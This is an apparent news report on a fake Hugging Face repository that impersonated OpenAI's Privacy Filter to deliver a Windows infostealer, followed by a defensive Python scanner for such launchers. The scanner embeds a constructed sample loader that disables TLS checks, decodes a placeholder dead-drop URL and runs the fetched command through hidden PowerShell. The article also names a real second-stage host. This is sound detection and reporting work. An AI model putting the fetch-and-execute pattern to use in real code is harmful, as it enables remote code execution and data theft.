Fake OpenAI Privacy Filter Repo Hits #1 on Hugging Face, Draws 244K Downloads

https://thehackernews.com/2026/05/fake-openai-privacy-filter-repo-hits-1.html

Publish Date: 2026-05-11 03:05:00

Source Domain: thehackernews.com

Ravie Lakshmanan | May 11, 2026 | Supply Chain Attack / Threat Intelligence

A malicious Hugging Face repository managed to take a spot in the platform’s trending list by impersonating OpenAI’s Privacy Filter open-weight model to deliver a Rust-based information stealer to Windows users.

The project, named Open-OSS/privacy-filter, masqueraded as its legitimate counterpart (openai/privacy-filter), released by OpenAI late last month, going as far as copying the entire description verbatim to trick unsuspecting users into downloading it. Access to the malicious model has since been disabled by Hugging Face.

Privacy Filter was unveiled in April 2026 by the artificial intelligence (AI) company as a way to detect and redact personally identifiable information (PII) in unstructured text, with the aim of helping developers build strong privacy and security protections into their applications.

“The repository had typosquatted OpenAI’s legitimate Privacy Filter release, copied its model card nearly verbatim, and shipped a loader.py file that fetches and executes infostealer malware on Windows machines,” the HiddenLayer Research Team said in a report published last week.

The malicious project instructs users to clone the repository and run a batch script (“start.bat”) for Windows or a Python script (“loader.py”) for Linux or macOS systems to configure all necessary dependencies and start the model.

Once launched, the Python script triggers malicious code that disables SSL certificate verification, decodes a Base64-encoded URL pointing to a page hosted on JSON Keeper, and fetches from it a command that is passed to PowerShell for execution. The use of JSON Keeper, a public JSON paste service, as a dead drop resolver lets the attackers switch payloads on the fly without modifying the repository, so the code visible on Hugging Face never has to change to deliver a new second stage.

The PowerShell command is used to download a batch script from a remote server (“api.eth-fastscan[.]org”) and launch it using “cmd.exe.” The batch script functions as a second-stage downloader…
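The launcher pattern described above (TLS verification disabled, a Base64 literal that decodes to a dead-drop URL, the fetched text handed to PowerShell) is easy to triage statically before anyone runs a repository's start script. The scanner below is an added example written for this article; it is not code from HiddenLayer, OpenAI or the malicious repository. It walks a Python file's AST and flags the three indicators. The embedded `SAMPLE_LOADER` is a constructed stand-in that only mimics the behaviour the article describes; the `jsonkeeper.example` hostname and path are placeholders, not the real dead-drop URL.

```python
"""Static triage of a loader.py-style launcher for the dead-drop resolver pattern.

Added example, not part of the original article or the malicious repository.
"""
import ast
import base64
import binascii
import re

# Constructed sample that mimics the launcher behaviour described in the article.
# The dead-drop host and path are placeholders, not real indicators.
_DEAD_DROP = base64.b64encode(b"https://jsonkeeper.example/b/abc123").decode()
SAMPLE_LOADER = f'''
import ssl, base64, urllib.request, subprocess
ssl._create_default_https_context = ssl._create_unverified_context
u = base64.b64decode("{_DEAD_DROP}").decode()
cmd = urllib.request.urlopen(u).read().decode()
subprocess.run(["powershell", "-w", "hidden", "-c", cmd], shell=False)
'''

URL_RE = re.compile(r"^https?://", re.I)
SHELL_RE = re.compile(r"^(powershell|pwsh|cmd)(\.exe)?$", re.I)
# Function names that hand a string to the OS for execution.
EXEC_FUNCS = {"run", "Popen", "call", "check_output", "check_call", "system", "popen"}


def _call_name(node: ast.Call) -> str:
    """Return the dotted name of a call target, e.g. 'subprocess.run'."""
    parts = []
    f = node.func
    while isinstance(f, ast.Attribute):
        parts.append(f.attr)
        f = f.value
    if isinstance(f, ast.Name):
        parts.append(f.id)
    return ".".join(reversed(parts))


def _string_literals(node: ast.AST):
    """Yield every string constant nested anywhere under a node."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            yield sub.value


def _decode_b64(s: str):
    """Strictly decode a string literal as Base64; return text or None."""
    try:
        return base64.b64decode(s, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def triage(source: str) -> dict:
    """Scan Python source and return the three indicator groups, each a list of findings."""
    tree = ast.parse(source)
    findings = {"ssl_disabled": [], "encoded_urls": [], "shell_exec": []}
    for node in ast.walk(tree):
        # 1. TLS verification turned off: monkeypatched default context or verify=False.
        if isinstance(node, ast.Assign):
            for t in node.targets:
                if isinstance(t, ast.Attribute) and t.attr == "_create_default_https_context":
                    findings["ssl_disabled"].append(f"line {node.lineno}: ssl default context patched")
        if isinstance(node, ast.Call):
            for kw in node.keywords:
                if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                    findings["ssl_disabled"].append(f"line {node.lineno}: verify=False")
            # 3. An exec-style call whose arguments name PowerShell or cmd.
            name = _call_name(node)
            if name.split(".")[-1] in EXEC_FUNCS:
                for s in _string_literals(node):
                    if SHELL_RE.match(s):
                        findings["shell_exec"].append(f"line {node.lineno}: {name} -> {s}")
        # 2. A Base64 literal that decodes to a URL: the dead-drop resolver.
        if isinstance(node, ast.Constant) and isinstance(node.value, str) and len(node.value) >= 16:
            decoded = _decode_b64(node.value)
            if decoded and URL_RE.match(decoded):
                findings["encoded_urls"].append(f"line {node.lineno}: {decoded}")
    return findings


if __name__ == "__main__":
    for group, hits in triage(SAMPLE_LOADER).items():
        print(group, hits)
```

Any one of the three groups being non-empty in a "setup" script shipped with model weights is reason to stop and read the file by hand; all three together, as in the constructed sample, is the shape of the loader HiddenLayer describes. Run it over every `.py` in a cloned repository, and remember that a `.bat` entry point needs its own review since this scanner only parses Python.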
